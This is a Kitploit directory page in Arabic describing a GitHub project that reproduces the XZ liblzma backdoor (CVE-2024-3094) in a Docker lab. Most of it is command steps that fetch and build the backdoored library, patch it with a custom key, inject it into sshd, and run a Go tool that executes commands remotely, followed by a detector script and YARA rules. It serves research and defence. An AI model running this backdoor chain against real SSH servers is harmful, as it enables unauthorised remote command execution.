Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/valeriot30/cve-2024-3094
تحليل الثغرات الأمنيةالاستغلالتحليل البرمجيات الخبيثةتحليل الملفات الثنائيةالتعلم والتعليممختبرات وتدريب عملي
GitHubvaleriot30/cve-2024-3094

cve-2024-3094

ثغرة باب خلفي في XZ موضحة بالتفاصيل

عرض المستودع
113منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🛡️ مشروع الأمن السيبراني: تحليل الباب الخلفي XZ في liblzma

📄 نظرة عامة

يحلل هذا المشروع الباب الخلفي البارز المكتشف في xz-utils (liblzma)، والذي يؤثر على الإصدارين 5.6.0 و 5.6.1. استهدف الكود الخبيث الذي تم إدخاله في نظام بناء المنبع مصادقة SSH عن طريق تعديل كيفية تفاعل sshd مع مكتبة ضغط LZMA في وقت التشغيل.

⚠️ هذا المشروع لأغراض البحث التعليمي والدفاعي فقط.

الجهاز الضعيف

استنساخ هذا المستودع

root@kitploit:~
git clone https://github.com/valeriot30/cve-2024-3094

انتقل إلى الدليل

root@kitploit:~
cd cve-2024-3094

تشغيل حاوية docker

root@kitploit:~
docker build -t fedora-dev .
docker run --privileged -it --rm -p 2222:22 fedora-dev

الحصول على نسخة ضارة من المكتبة

root@kitploit:~
cd ~  
git clone https://github.com/thesamesam/xz-archive.git  
cd xz-archive/5.6/ # The vulnerable version ( it works as well with 5.6.1 )  
tar xzf xz-5.6.0.tar.gz  
mv xz-5.6.0 ~

تصدير هدف البناء

root@kitploit:~
export RPM_ARCH=$(uname -m)

تجميع المكتبة الضارة

root@kitploit:~
cd ~
 cd ./xz-5.6.0/  
./configure
make -j 8

نسخ SO الضار إلى الخارج:

root@kitploit:~
cp ./src/liblzma/.libs/liblzma.so.5.6.0 ~

استنساخ المستودع مرة أخرى داخل الحاوية

root@kitploit:~
git clone https://github.com/valeriot30/cve-2024-3094

تطبيق التصحيح على مكتبة liblzma بمفتاح مخصص

root@kitploit:~
 python3 cve-2024-3094/patch.py liblzma.so.5.6.0

ربط المكتبة الضارة في النظام

root@kitploit:~
 sh cve-2024-3094/inject.sh

تشغيل sshd المرتبط بالمكتبة الضارة

root@kitploit:~
 env -i LANG=C /usr/sbin/sshd -D &

جهاز المهاجم

استنساخ هذا المستودع

root@kitploit:~
git clone https://github.com/valeriot30/cve-2024-3094

انتقل إلى الدليل

root@kitploit:~
cd cve-2024-3094

تجميع أداة GO

root@kitploit:~
go build

استخدم الأداة بإدخال عنوان IP للجهاز الضعيف والأمر المراد تنفيذه

root@kitploit:~
./bot -addr 127.0.0.2:2222 -cmd 'sleep 60'

الإجراءات المضادة

استخدام الكاشف

تشغيل الكاشف

root@kitploit:~
sh detector.sh

استخدام Yara

استخدام قواعد مطابقة yara

root@kitploit:~
yara rule.yar ../liblzma.so.5.6.0 -s
تنزيل الأداة